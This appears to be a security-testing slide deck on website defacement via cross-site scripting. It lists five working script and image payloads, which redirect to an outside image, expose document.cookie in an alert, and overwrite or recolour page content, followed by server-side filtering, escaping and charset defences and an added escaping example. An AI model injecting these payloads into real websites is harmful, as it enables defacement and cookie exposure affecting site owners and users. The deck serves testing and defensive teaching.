Website Defacement Techniques
1.
2. Introduction
• Website defacement is an attack on a website that
changes the visual appearance of the site or a webpage.
Defacing is one of the most common things a hacker does
after finding a vulnerability in a website.
• Defacement is generally meant as a kind of electronic
graffiti, although recently it has become a means to
spread messages by politically motivated "cyber
protesters" or hacktivists.
3. Testing
• Test will be entered and captured each time using OWASP's
ZAP Proxy. Once it is captured, we will then replace Test
with our malicious code, in turn bypassing the client-side
preventions the website has in place.
4. 1
• Redirects to a hacked image outside the app domain
<script>window.location="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>
5. 2
• Adds a hacked image to the page
<img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg"
onerror=alert(document.cookie);>
6. 3
• Covers the full page with "Hacked" - in app domain
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
7. 4
• Change background to RED - in App Domain
<script>document.body.bgColor="red";</script>
8. 5
• Set the background to hacked image - in app domain
<script>document.body.background="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>
9. 1
Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of these characters
are needed by the application, properly escaping them is enough. A non-comprehensive list of characters likely to be part of an
attack vector is:
• <> (triangular parentheses)
• () (parentheses)
• " (quotation mark)
• & (ampersand sign)
• ' (single apostrophe)
• + (plus sign)
• % (percent sign)
• = (equals sign)
• : (colon)
• ` (forward tick)
• ; (semicolon)
• ´ (back tick)
2
Escape all untrusted output before presenting it to the UI. Follow the rules detailed at the following link to ensure proper
escaping for every context and location:
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
3
When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).
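Items 2 and 3 above as an added example (not part of the original slides): a server-side escaper for the HTML body and quoted-attribute contexts, run against payloads from the test slides, with the charset fixed in the response header. The names escapeHtml, renderComment, isInert and SAMPLE_PAYLOADS and the example.invalid URL are assumptions made for illustration.

```javascript
// Added example: output escaping for HTML body and quoted-attribute contexts only.
// Script, URL and CSS contexts need their own encoders (see the OWASP cheat sheet).
const ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "`": "&#x60;",
  "=": "&#x3D;",
};

// Replace every character that can open a tag, close an attribute or start an entity.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'`=]/g, (ch) => ESCAPES[ch]);
}

// Build a response the way a server handler would: fixed charset, escaped output.
function renderComment(untrusted) {
  const safe = escapeHtml(untrusted);
  return {
    headers: { "Content-Type": "text/html; charset=utf-8" },
    body: `<p class="comment" title="${safe}">${safe}</p>`,
  };
}

// Constructed inputs: payloads from the test slides, image URL replaced by a placeholder.
const SAMPLE_PAYLOADS = [
  '<script>window.location="http://example.invalid/hacked.jpg";</script>',
  '<img src="http://example.invalid/hacked.jpg" onerror=alert(document.cookie);>',
  '<script>document.body.bgColor="red";</script>',
];

// True when the body contains only the two tags the template itself wrote.
function isInert(body) {
  const tags = body.match(/<[^>]*>/g) || [];
  return tags.length === 2 && tags[0].startsWith("<p ") && tags[1] === "</p>";
}

for (const payload of SAMPLE_PAYLOADS) {
  const res = renderComment(payload);
  console.log(isInert(res.body), res.body);
}
```

Because the escaping happens on the server at output time, replacing the captured request value in a proxy does not bypass it the way it bypasses client-side checks.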